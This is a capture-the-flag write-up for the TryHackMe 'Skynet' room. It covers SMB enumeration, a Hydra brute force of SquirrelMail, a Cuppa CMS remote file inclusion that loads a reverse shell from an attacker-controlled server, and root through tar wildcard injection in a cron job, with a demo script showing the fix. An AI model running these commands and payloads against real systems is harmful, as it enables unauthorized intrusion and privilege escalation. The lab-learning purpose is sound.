Initial Reconnaissance

Perform a comprehensive port scan of the target with Nmap (service/version detection, default scripts and OS fingerprinting, as the output below shows):

Nmap scan report for 10.112.185.65
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL RESP-CODES CAPA UIDL AUTH-RESP-CODE PIPELINING TOP
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: have ID LOGINDISABLEDA0001 LITERAL+ IMAP4rev1 more listed OK post-login capabilities Pre-login ENABLE IDLE LOGIN-REFERRALS SASL-IR
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/19%OT=22%CT=1%CU=37747%PV=Y%DS=1%DC=T%G=Y%TM=69E5565
OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M23
OS:01ST11NW7%O6=M2301ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68
OS:DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Network Distance: 1 hop
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: -1s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2026-04-19T17:25:27-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2026-04-19T22:25:27
|_  start_date: N/A

TRACEROUTE (using port 53/tcp)
HOP RTT     ADDRESS
1   0.60 ms 10.112.185.65

SMB Enumeration

Enumerate the SMB service (Samba 4.3.11 on ports 139/445) for shares that are readable without credentials; any file we can pull from them may hold usernames or passwords.

Listing Available Shares

crackmapexec smb 10.112.185.65 -u '' -p '' --shares
SMB         10.112.185.65   445    SKYNET           [*] Windows 6.1 (name:SKYNET) (domain:) (signing:False) (SMBv1:True)
SMB         10.112.185.65   445    SKYNET           [+] \: 
SMB         10.112.185.65   445    SKYNET           [*] Enumerated shares
SMB         10.112.185.65   445    SKYNET           Share           Permissions     Remark
SMB         10.112.185.65   445    SKYNET           -----           -----------     ------
SMB         10.112.185.65   445    SKYNET           print$                          Printer Drivers
SMB         10.112.185.65   445    SKYNET           anonymous       READ            Skynet Anonymous Share
SMB         10.112.185.65   445    SKYNET           milesdyson                      Miles Dyson Personal Share
SMB         10.112.185.65   445    SKYNET           IPC$                            IPC Service (skynet server (Samba, Ubuntu))

Findings:

  • anonymous — accessible without credentials
  • milesdyson — likely a user's private share
  • IPC$ — inter-process communication share

Accessing the Anonymous Share

smbclient -N -U '' //10.112.185.65/anonymous

The -N flag skips the password prompt. The share contains a text file, attention.txt, and a logs directory.

Content (reproduced in the original as a screenshot): a notice, signed by Miles Dyson, that passwords have been changed.

This confirms milesdyson as a valid username and hints at password changes.

Navigate to the logs directory (cd logs in the smbclient session), which holds three files.

Download all three files:

get log1.txt
get log2.txt
get log3.txt

Analysis:

  • log1.txt contains a list of passwords
  • log2.txt and log3.txt are empty

Web Application Enumeration

Port 80 serves an Apache 2.4.18 site titled Skynet (from the Nmap http-title script). Enumerate it for hidden directories.

Directory Bruteforcing

dirb http://10.112.185.65/

A /squirrelmail directory is found. SquirrelMail is a PHP webmail front end that authenticates against the Dovecot IMAP service seen on port 143, so valid mail credentials will also log in here.

Intercept the login request and response with Burp Suite to learn the form's field names (login_username, secretkey, and the hidden js_autodetect_results and just_logged_in fields) and the error string returned on a failed login ("Unknown user or password incorrect."). Hydra needs both.

Use Hydra to brute-force the login with the password list from log1.txt:

hydra -l milesdyson -P /root/log1.txt 10.112.185.65 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown user or password incorrect."

Hydra finds a valid password for the milesdyson account:

Username : milesdyson
Password : cyborg007haloterminator

Log into SquirrelMail with the discovered credentials. The inbox contains three emails; one of them contains the reset Samba password for milesdyson.

Password: )s{A&2Z=F^n_E.B`

I checked the other emails and did not find anything interesting in them. Let's now connect to the milesdyson share with the credentials we just found:

crackmapexec smb 10.112.185.65 -u 'milesdyson' -p ')s{A&2Z=F^n_E.B`' --shares --local-auth
SMB         10.112.185.65   445    SKYNET           [*] Windows 6.1 (name:SKYNET) (domain:SKYNET) (signing:False) (SMBv1:True)
SMB         10.112.185.65   445    SKYNET           [+] SKYNET\milesdyson:)s{A&2Z=F^n_E.B` 
SMB         10.112.185.65   445    SKYNET           [*] Enumerated shares
SMB         10.112.185.65   445    SKYNET           Share           Permissions     Remark
SMB         10.112.185.65   445    SKYNET           -----           -----------     ------
SMB         10.112.185.65   445    SKYNET           print$          READ            Printer Drivers
SMB         10.112.185.65   445    SKYNET           anonymous       READ            Skynet Anonymous Share
SMB         10.112.185.65   445    SKYNET           milesdyson      READ            Miles Dyson Personal Share
SMB         10.112.185.65   445    SKYNET           IPC$                            IPC Service (skynet server (Samba, Ubuntu))

Finding the Hidden Directory

Connect to the milesdyson share and navigate to the notes directory:

smbclient -U 'milesdyson' //10.112.185.65/milesdyson

Download important.txt

get important.txt

Content (shown as a screenshot in the original): notes that reference a hidden directory on the web server.

A hidden directory /45kra24zxs28v3yd is revealed

Navigate to http://10.112.185.65/45kra24zxs28v3yd/. This displays a personal page for Miles Dyson


Further directory enumeration reveals an administrator panel

dirsearch -u http://10.112.185.65/45kra24zxs28v3yd/

Discovery: /45kra24zxs28v3yd/administrator/ — this is a Cuppa CMS login page.


Search for a public exploit for Cuppa CMS (for example with searchsploit). The hit is a file-inclusion vulnerability in administrator/alerts/alertConfigField.php, reached through its urlConfig parameter.

This is the exploit description, quoted from the Exploit-DB entry:

An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.

Exploit: the urlConfig value is used unvalidated as the file name that gets included, so pointing it at a URL on an attacker-controlled web server makes the target fetch and evaluate that PHP file (remote file inclusion). Remote inclusion only works when PHP's allow_url_include setting is enabled; otherwise the same parameter still gives local file inclusion.

Download the PentestMonkey PHP reverse shell (php-reverse-shell.php from the pentestmonkey/php-reverse-shell GitHub repository) and set its $ip and $port variables to the attacking machine (10.112.82.136) and the listener port (4444).

Start a Python HTTP server, from the directory holding the shell, to host it:

python3 -m http.server 1234

Start a Netcat listener:

nc -lvnp 4444

Triggering the RFI Exploit

Send the following request to include and execute the reverse shell

http://10.112.185.65/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.112.82.136:1234/php-reverse-shell.php

The target fetches the file from the Python server and evaluates it, and a reverse shell connects back to the listener as www-data.

Capturing the User Flag

cd /home/milesdyson
cat user.txt

Privilege Escalation — Tar Wildcard Injection

Download LinPEAS on the attacking machine, into the directory served by the Python HTTP server started earlier:

curl -L -o linpeas.sh https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

(Piping the download straight into sh would run it locally rather than save it.) Transfer it to the victim machine and run it:

wget http://10.112.82.136:1234/linpeas.sh -O linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Note that wget's lowercase -o names the log file, not the download; with it, wget saves the file under its URL name (linpeas.sh, or linpeas.sh.1 if that name already exists), which is why the original run ended up executing linpeas.sh.1. Uppercase -O sets the output file name.

Identifying the Cronjob

LinPEAS shows a cron job that runs /home/milesdyson/backups/backup.sh as root every minute.

Let's check the content of backup.sh:

cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

The script runs tar with a shell wildcard (*) in /var/www/html, a directory writable by www-data. That allows a wildcard injection against tar's --checkpoint options.

What is happening here: a root cron job runs every minute and archives everything in /var/www/html. Because the backup command uses *, the shell expands it to the names of the files in that directory, and any name that begins with -- reaches tar as a command-line option rather than as a file to archive. That is the behaviour we will exploit.

To exploit this vulnerability, I will create the following three files in /var/www/html:

1. --checkpoint=1 This enables tar's checkpoint mode, firing a checkpoint after every record.

2. --checkpoint-action=exec=sh shell.sh This makes tar run sh shell.sh at each checkpoint (the space inside the file name survives because glob results are not word-split).

3. shell.sh containing the following:

cp /bin/bash /tmp/bash && chmod +s /tmp/bash

This copies bash to /tmp and sets the SUID bit. Because the cron job runs as root, the copy is root-owned and will execute with root's effective UID.

The next step is to wait one minute for the cron job to execute. When it runs, the following will occur:

  • The shell expands * and tar receives the two option-looking names alongside the real files.
  • tar treats them as options, enables checkpoints and runs sh shell.sh as root.
  • This creates a root-owned copy of bash at /tmp/bash with the SUID bit set.

Finally, run the SUID copy with -p so that bash keeps the effective root UID instead of dropping it:

/tmp/bash -p
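The whole sequence above, reproduced locally as an added example that is not part of the original writeup: the three planted file names, the unquoted * from backup.sh, and the fix. It needs GNU tar (the Ubuntu default). The temporary directory stands in for /var/www/html and the payload writes a marker file instead of copying a SUID bash, so it can be run as an unprivileged user; those stand-ins are my own assumptions.

```sh
#!/bin/sh
# Added example, not part of the original writeup: reproduce the backup.sh
# wildcard injection locally with GNU tar, and show the fix.
# Everything happens in a temporary directory; cron and /var/www/html are
# only simulated, and shell.sh drops a marker file instead of a SUID bash.

# run_backup vulnerable|fixed
# Returns 0 if tar executed the planted shell.sh, 1 if it did not.
run_backup() {
    mode=$1
    work=$(mktemp -d)
    html="$work/html"            # stands in for /var/www/html
    mkdir "$html"
    echo '<h1>Skynet</h1>' > "$html/index.html"

    # The three files the attacker plants in the web root. The payload only
    # creates a marker here; on the target it was cp /bin/bash ... chmod +s.
    printf 'touch "%s/marker"\n' "$work" > "$html/shell.sh"
    : > "$html/--checkpoint=1"
    : > "$html/--checkpoint-action=exec=sh shell.sh"

    if [ "$mode" = vulnerable ]; then
        # backup.sh as found on the box: the unquoted * expands to the file
        # names, and tar parses the two that start with -- as options.
        (cd "$html" && tar cf "$work/backup.tgz" * 2>/dev/null)
    else
        # Hardened: -- ends option parsing, so every expansion is a path.
        # Archiving . instead of * would avoid the problem as well.
        (cd "$html" && tar cf "$work/backup.tgz" -- * 2>/dev/null)
    fi

    if [ -e "$work/marker" ]; then
        rm -rf "$work"
        return 0
    fi
    rm -rf "$work"
    return 1
}

# Stand-alone run: show both outcomes.
if run_backup vulnerable; then
    echo "vulnerable backup.sh: tar ran shell.sh via --checkpoint-action"
else
    echo "vulnerable backup.sh: payload did not fire (non-GNU tar?)"
fi
if run_backup fixed; then
    echo "fixed backup.sh: payload still fired"
else
    echo "fixed backup.sh: names after -- were archived as plain files"
fi
```

The vulnerable branch is the cron job's command verbatim; the only difference in the fixed branch is the -- before the glob, which is the smallest change that makes backup.sh safe. On the real target the same check is what the one-minute wait does: once /tmp/bash appears with the SUID bit, the payload has run as root.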

Capturing the Root Flag

cat /root/root.txt

Finally, thank you very much for reading to the end. I hope you found this article interesting.

Room Link: https://tryhackme.com/room/skynet

TryHackMe: https://tryhackme.com/p/AbdallahSamir

LinkedIn: Abdallah Samir | LinkedIn

X(Twitter): https://x.com/abdalla_jr7